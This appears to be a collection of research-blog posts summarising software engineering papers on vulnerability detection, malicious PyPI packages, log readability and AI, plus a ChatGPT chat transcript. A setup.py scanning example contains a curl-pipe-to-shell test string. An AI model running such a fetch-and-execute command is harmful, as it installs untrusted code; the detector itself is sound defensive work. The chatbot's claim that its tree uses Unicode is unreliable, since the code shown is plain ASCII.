Vulnerability detection – addressing the #1 problem

https://arxiv.org/pdf/2308.10523.pdf

One of the major issues with vulnerability detection in source code is unbalanced data. Although there are many known vulnerabilities, examples of them are rather scarce. SonarQube, as a tool, can detect only ca. 30 vulnerabilities out of over 200,000 existing ones. This paper is about making the job of finding security holes in software code easier and more reliable, even when there are not a lot of clear-cut examples of what’s bad and what’s not. The main points of the paper are:

  1. The PILOT model: The researchers came up with a smart model named PILOT that only needs examples of risky code and a bunch of other code where we don’t know if it’s safe or risky. It’s like having a detective who’s really good at spotting something fishy with just a few clues.
  2. How PILOT Works: PILOT has two cool tricks up its sleeve. First, it’s got a keen eye for picking out which pieces of the “unknown” code are probably safe. Second, it learns to tell the difference between safe and risky code in a way that’s not thrown off by a few mistakes in the data.
  3. The Proof is in the Pudding: They tested PILOT with real-world data and found it did a better job than other methods, even when those methods had more information to go on. PILOT was also pretty good at catching mistakes in the data where something was labeled as safe but was actually risky.
  4. Why It Matters: This approach is a game-changer because it means you can still get good at finding security risks even if you don’t have a ton of well-labeled data. It’s like being able to train a super sniffer dog with only a few scents rather than the whole scent library.

In essence, PILOT is like a detective that doesn’t need the whole story to solve the case. It can make do with just the good bits and still crack the code on what’s a security risk and what’s not.
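
For readers who want a more concrete picture, below is a minimal sketch of the two-step positive-unlabeled (PU) learning idea that models like PILOT build on. It is my own illustration in scikit-learn, not the authors’ implementation; the feature matrices, the 30% “reliable negative” fraction and the logistic regression classifier are all assumptions made for the example.

# Hypothetical two-step PU-learning sketch (not the authors' PILOT model).
# X_pos and X_unlabeled are 2-D NumPy feature arrays extracted from code.
import numpy as np
from sklearn.linear_model import LogisticRegression

def pu_two_step(X_pos, X_unlabeled, neg_fraction=0.3):
    # Step 1: treat all unlabeled code as negative and fit a rough classifier.
    X = np.vstack([X_pos, X_unlabeled])
    y = np.concatenate([np.ones(len(X_pos)), np.zeros(len(X_unlabeled))])
    rough = LogisticRegression(max_iter=1000).fit(X, y)

    # Step 2: keep only the unlabeled samples the rough model is most
    # confident are safe -- the "reliable negatives".
    scores = rough.predict_proba(X_unlabeled)[:, 1]
    n_neg = int(neg_fraction * len(X_unlabeled))
    reliable_neg = X_unlabeled[np.argsort(scores)[:n_neg]]

    # Step 3: retrain on positives vs. reliable negatives only.
    X2 = np.vstack([X_pos, reliable_neg])
    y2 = np.concatenate([np.ones(len(X_pos)), np.zeros(len(reliable_neg))])
    return LogisticRegression(max_iter=1000).fit(X2, y2)

The selection step is what makes this family of methods robust to label noise: a few risky samples hiding in the “unknown” pile are unlikely to be picked as reliable negatives.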

Libraries and security

https://arxiv.org/pdf/2309.11021.pdf

I often use Python because of its large ecosystem of libraries. Thanks to these libraries, I do not have to focus on the details of the implementation but can focus on the task at hand. However, not all libraries are benign, and therefore this paper captured my attention. The study aims to understand the characteristics and lifecycle of malicious code in PyPI by building an automated data collection framework and analyzing a dataset of malicious package files.

Key findings and contributions of the paper include:

  1. Empirical Analysis: The authors conducted an empirical study to understand the characteristics and lifecycle of malicious code in the PyPI ecosystem.
  2. Automated Data Collection: They built an automated data collection framework to gather a high-quality dataset of malicious code from PyPI mirrors and other sources.
  3. Dataset Construction: The dataset includes 4,669 malicious package files, making it one of the largest publicly available datasets of PyPI malicious packages.
  4. Classification Framework: An automated classification framework was developed to categorize the collected malicious code into different types based on their behavior characteristics.
  5. Malicious Behavior: The research found that over 50% of the malicious code exhibits multiple malicious behaviors, with information stealing and command execution being particularly prevalent.
  6. Novel Attack Vectors and Anti-Detection Techniques: The study observed several novel attack vectors and anti-detection techniques used by malicious code.
  7. Impact on End-User Projects: It was revealed that 74.81% of all malicious packages successfully entered end-user projects through source code installation, increasing security risks.
  8. Persistence in Mirror Servers: Many reported malicious packages persist in PyPI mirror servers globally, with over 72% remaining for an extended period after being discovered.
  9. Lifecycle Portrait: The paper sketches a portrait of the malicious code lifecycle in the PyPI ecosystem, reflecting the characteristics of malicious code at different stages.
  10. Suggested Mitigations: The authors present some suggested mitigations to improve the security of the Python open-source ecosystem.

The study is significant as it provides a systematic understanding of the propagation patterns, influencing factors, and potential hazards of malicious code in the PyPI ecosystem. It also offers a foundation for developing more efficient detection methods and improving the security practices within the software supply chain.
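
To make one of the findings – command execution during installation – more tangible: when a package is installed from source, its setup.py runs arbitrary Python. Below is a hypothetical heuristic of my own, not the paper’s classification framework, that flags suspicious call names in a setup.py; the list of names is an assumption for illustration.

# Hypothetical heuristic: flag suspicious call names in a setup.py.
# Illustrative only -- not the paper's classification framework.
import ast

SUSPICIOUS = {"system", "popen", "exec", "eval", "run", "check_output"}

def find_suspicious_calls(setup_py_source: str) -> list[str]:
    hits = []
    for node in ast.walk(ast.parse(setup_py_source)):
        if isinstance(node, ast.Call):
            func = node.func
            # Handle both os.system(...) and bare exec(...) call styles.
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if name in SUSPICIOUS:
                hits.append(name)
    return hits

print(find_suspicious_calls("import os\nos.system('curl example.test | sh')"))
# -> ['system']

A real detector would of course have to handle obfuscation and dynamic imports – exactly the kind of anti-detection techniques the paper reports.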

Understanding log files…

https://ginolzh.github.io/papers/ASE2023_Log_Message_Readability.pdf

Debugging and testing often require analyzing log files. This means that we need to read a lot of lines of information that can be useful but, at the same time, are difficult to parse. Therefore, this paper is of interest to anyone who must read these files once in a while.

This paper investigates the readability of log messages in software logging. The authors conducted a comprehensive study involving interviews with industrial practitioners, manual investigation of log messages in open-source systems, online surveys, and the exploration of automatic classification of log message readability using machine learning.

Key findings and contributions of the paper include:

  1. Practitioners’ Expectations (RQ1): Through interviews, the authors identified three aspects related to log message readability: Structure, Information, and Wording. They also derived specific practices to improve each aspect. Survey participants acknowledged the importance of these aspects, with Information being considered the most critical.
  2. Readability in Open Source Systems (RQ2): A manual investigation of log messages from nine large-scale open-source systems revealed that 38.1% of log messages have inadequate readability, particularly in the aspect of Information.
  3. Automatic Classification (RQ3): The study explored the use of deep learning and machine learning models to automatically classify the readability of log messages. The models achieved a balanced accuracy above 80% on average, indicating their effectiveness.
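
As an illustration of what such automatic classification could look like, here is a minimal sketch using TF-IDF features and logistic regression on a toy dataset. It is not the authors’ model – the example messages, labels and pipeline are my own assumptions.

# Hypothetical readability classifier on a toy dataset (not the paper's models).
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import balanced_accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline

messages = [
    "Failed to connect to database 'orders': timeout after 30 s",  # adequate
    "err 42",                                                      # inadequate
    "Retrying upload of file %s (attempt %d of %d)",               # adequate
    "something happened",                                          # inadequate
]
labels = [1, 0, 1, 0]  # 1 = adequate readability, 0 = inadequate

X_train, X_test, y_train, y_test = train_test_split(
    messages, labels, test_size=0.5, stratify=labels, random_state=0)

clf = make_pipeline(TfidfVectorizer(), LogisticRegression())
clf.fit(X_train, y_train)

# Balanced accuracy is the metric the paper reports (above 80% on average).
print(balanced_accuracy_score(y_test, clf.predict(X_test)))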

The paper’s contributions are significant as it is one of the first studies to investigate log message readability through interviews with industrial practitioners. It highlights the prevalence of inadequate readability in log messages within large-scale open-source systems and demonstrates the potential of machine learning models to classify log message readability automatically.

The study provides systematic comprehension of log message readability and offers empirically-derived guidelines to improve developers’ logging practices. It also opens avenues for future research to establish standards for composing log messages.

The authors conclude that their study sheds light on the importance of log message readability and provides a foundation for future work to improve logging practices in software development.

Ethics in data mining

Image by Tumisu from Pixabay

https://link.springer.com/article/10.1007/s10664-021-10057-7

A lot of software engineering research studies use open source data and mine software repositories. It is a common practice, since it allows us to test our hypotheses before asking our collaborating companies for their precious resources. By mining open source data we can also learn whether our study makes sense; we can see it as a pilot study of sorts.

Mining software repositories has evolved into a popular activity since we got access to platforms like GitHub. There are even guidelines for assessing this kind of study, e.g., https://sigsoft.org/EmpiricalStandards/docs/, and we have regulations on what we can do with open source data – these can come in the form of a license, a law (like the GDPR or the CCPA) or the need to ask an ethical board for approval. However, there is also common sense – not everything that is legal is appropriate or ethical. We always need to ensure that no individual can be subjected to any harm as a result of our actions.

In the article that I want to bring up today, the authors discuss ethical frameworks for software engineering studies based on open source repositories. We need to make sure that we uphold:

  1. Respect for persons, which stresses the need for approval and consent.
  2. Beneficence, which means that we need to minimize harm but maximize benefit.
  3. Justice, which means that we need to consider each individual equally.
  4. Respect for law and public interest, which entails conducting due diligence on which data we can use and in which way.

The most interesting part of this article is the analysis of different cases of mining software repositories – for example, analyzing the code, reviews, commit messages and other types of data in the repositories.

I recommend this article for everyone who considers working with mining software repositories.

What the GPT technology really changes in SE

Image source: Pixabay

GPT technology, exemplified by GitHub Copilot and its likes, is changing software engineering from the ground up. There is no doubt that the technology places a new tool in our engineering shed. It allows us to create software with a completely different set-up than what we are used to.

Now, it really changes only a few things, but these are very big ones.

  1. Programmers —> designers and architects. GPT can write source code like no other tool on the market, and it only gets better at it. A quick glimpse at the GitHub Next website gives us a good understanding that this team has only just got started. This changes everything we know about engineering software. Bad programmers will disappear over time. Good software designers, architects and software engineers will take their place. They will be fewer in number, but better in quality.
  2. Software development —> software engineering. Designers will no longer get stuck solving a small bit of the puzzle; GPT will do that for them. Instead of thinking about how to write a test case, designers will think about how to test the software in the best possible way. They will focus on the engineering part of software engineering – something that I’m teaching my students from day one.
  3. Consultancy —> knowledge hubs. Since programming will become easier and more approachable, we will need people who know how to solve a problem, not just how to write a program. A big chunk of the consultancy companies’ business will disappear. The consultancy companies will instead specialize in their domains and in problem-solving.

Other things will happen as well. Requirements will not be the same as they are today. Testing will be different, architecting will be smarter and management more effective. Knowledge will be more valued, and critical thinking will be needed even more.

Well, this is my end of the academic year blog post. More to come after the summer. Stay safe!

Continuous deployment in systems of systems…

Continuous deployment in software-intensive system-of-systems – ScienceDirect (gu.se)

Interestingly, this is a paper from colleagues of ours from the department. The paper presents how one company – Ericsson – works with continuous deployment of its large software system in 3G RAN (Radio Access Networks). The highlights from the article are as follows:

  • New software field testing and validation activities become continuous.
  • Software deployment should be orchestrated between the constituent systems.
  • A pilot customer to partner with is key for success.
  • Companywide awareness and top management support are important.
  • Documentation and active monitoring are critical for continuous deployment.

I like this paper because it presents a practical approach and a good set of practices that can be taken up by other companies.

Transparency and explainability of AI…

Image by Sergey Gricanov from Pixabay

Transparency and explainability of AI systems: From ethical guidelines to requirements – ScienceDirect

In the era of ChatGPT and increasingly larger language models, it is important to understand how these models reason – not only because we want to put them in safety-critical systems, but mostly because we need to know why they make things up.

In this paper, the authors draw conclusions regarding how to increase the transparency of AI models. In particular, they highlight that:

  • The AI ethical guidelines of 16 organizations emphasize explainability as the core of transparency.
  • When defining explainability requirements, it is important to use multi-disciplinary teams.

They define a four-quadrant model for the explainability of requirements and AI systems. The model links four key questions to a number of aspects:

  1. What to explain (e.g., roles and capabilities of AI).
  2. In what kind of situation (e.g., when testing).
  3. Who explains (e.g., AI explains itself).
  4. To whom to explain (e.g., customers).

It’s an interesting read that takes AI systems to a more practical level and provides the ability to turn explainability into software requirements.
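
As a small illustration of how the four questions could become a concrete requirement artifact, here is a hypothetical sketch; the field names and example values are my own, not from the paper.

# Hypothetical sketch: one explainability requirement structured along
# the paper's four questions. Field names are my own invention.
from dataclasses import dataclass

@dataclass
class ExplainabilityRequirement:
    what: str        # what to explain, e.g. roles and capabilities of AI
    situation: str   # in what kind of situation, e.g. when testing
    explainer: str   # who explains, e.g. the AI explains itself
    audience: str    # to whom to explain, e.g. customers

req = ExplainabilityRequirement(
    what="why the system flagged a transaction as fraud",
    situation="during operation, for every flagged transaction",
    explainer="the AI system itself, via a generated rationale",
    audience="customer support staff",
)
print(req)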

Defect predictions – still valid in 2023…

Image by WikiImages from Pixabay

Industrial applications of software defect prediction using machine learning: A business-driven systematic literature review – ScienceDirect

Wow, when I look at the last entry, it was two months ago. Well, somewhere between the course in embedded systems for my students, a delegation to Silicon Valley and all kinds of challenges, time seemed to slip through my fingers.

Well, nevertheless, I would like to highlight the article from our colleagues who specialize in defect prediction and systematic reviews. The article describes how companies use defect prediction models and when they do it.

It’s a nice Sunday read for those of you who are interested in the topic. It is a good source of best practices as well as a solid starting point for finding datasets for defect prediction.

Enjoy your reading!

GitHub Co-pilot and code generation

So, this week’s post is my reflection on the seminar that we hosted last week (the recording is above). It was an eye-opener for me in a few respects.

First, there was the question of ownership. Since AI is not a legal subject, it cannot really own anything. I know, AI and computational models are not the same, but for the sake of the argument let’s assume that they are. At the end of the day, it is still a human being who presses the button and generates new source code, comments or what have you. So, the responsibility is still very much on us when we use these tools.

Second, there was the question about the community and why we have open-source software. We certainly do not put our source code out in the open for someone else to profit from it. Attribution and recognition are very important (if not the most important) aspects of any open-source community. So, using that code to create commercial models requires at least some attribution. Why not show which code was used to train these models and show how good the communities really are?

Finally, my main point still stands – we should use these models to become better. They make us so much more productive that we should not go back to the old ways of writing software. Providing suggestions and ideas to programmers can make our software better, shipped faster and potentially more reliable.

However, we need to make sure that we change the way we attribute software. Myself, I will start adding “co-created by GitHub Co-pilot and the OSS communities” to my work when I use the tool. Maybe you can do that too? At least to give some attribution back to our countless colleagues who deserve it…

Christmas post from ChatGPT

Image by Manfred Steger from Pixabay

I think that almost everyone in the field of SE has heard about the new bot – ChatGPT from OpenAI. The bot is capable of writing programs, holding conversations and even emulating virtual machines.

So, this year I wanted to check what ChatGPT can do. Here is my conversation with it:

M: What are the most important machine learning papers from 2022?

C: I’m sorry, but I don’t have access to papers or other information from 2022 because my knowledge was cut off in 2021. I can tell you about some important machine learning papers from the past, or provide general information about machine learning and how it has evolved over time. Is there something specific you would like to know about machine learning?

M: Ok, how about the most important papers from 2021?

C: I’m sorry, but I am not able to browse the internet and do not have access to information about specific papers or other developments that have occurred since my knowledge cutoff in 2021. However, there are many resources available online that can help you learn about the latest developments in the field of machine learning. Some places you might look for information about the most important machine learning papers from 2021 include scientific journals and conference proceedings, online news sources, and blogs or websites that cover developments in the field of artificial intelligence and machine learning. Additionally, you can check out the proceedings of major machine learning conferences, such as the International Conference on Machine Learning (ICML) and the Conference on Neural Information Processing Systems (NeurIPS), which are typically held each year and showcase the latest research in the field.

M: What is your prediction for machine learning field for 2023?

C: One trend that has been especially prominent in the field of machine learning in recent years is the increasing use of deep learning techniques, which have led to significant advances in a wide range of applications, including image and speech recognition, natural language processing, and autonomous systems. It is likely that this trend will continue in the coming years, as researchers continue to develop and refine deep learning algorithms and apply them to new and challenging problems.

Another trend that is likely to continue in the field of machine learning is the increasing importance of interpretability and explainability. As machine learning models become more sophisticated and are applied to more complex and sensitive tasks, it will be important to understand how they make their predictions and decisions, and to be able to explain these to users and stakeholders. Researchers and practitioners will therefore continue to focus on developing techniques for interpreting and explaining the behavior of machine learning models.

Finally, the field of machine learning will continue to be driven by the availability of large amounts of data and the increasing power and efficiency of computing hardware. As data continues to be generated at an ever-increasing rate, and as hardware capabilities continue to improve, it is likely that machine learning techniques will continue to advance and be applied to a wide range of problems and domains.

M: Ok, then write a program that draws a Christmas tree.

C:

Here is a Python program that uses ASCII art to draw a simple Christmas tree:

def draw_tree():
  print("   /\\")
  print("  /  \\")
  print(" /    \\")
  print("/      \\")
  print("--------")

draw_tree()

This code will output the following tree to the console:

   /\
  /  \
 /    \
/      \
--------

You can customize the appearance of the tree by modifying the print statements. For example, you could add more branches to the tree by adding additional print statements, or you could use different characters to create a more detailed or decorative tree.

Here is an example of a more detailed tree that uses a combination of ASCII art and Unicode characters to create a more realistic-looking tree:

def draw_tree():
  print("    /\\")
  print("   /  \\")
  print("  /    \\")
  print(" /      \\")
  print("/        \\")
  print("----------")
  print("   |||")
  print("   |||")
  print("   |||")

draw_tree()

Summary: well, the conversation is not very deep and not great either, which makes me sleep better at night, feeling that we (software engineers) are still needed in 2023. At least for the time being.

Have a wonderful holiday everyone!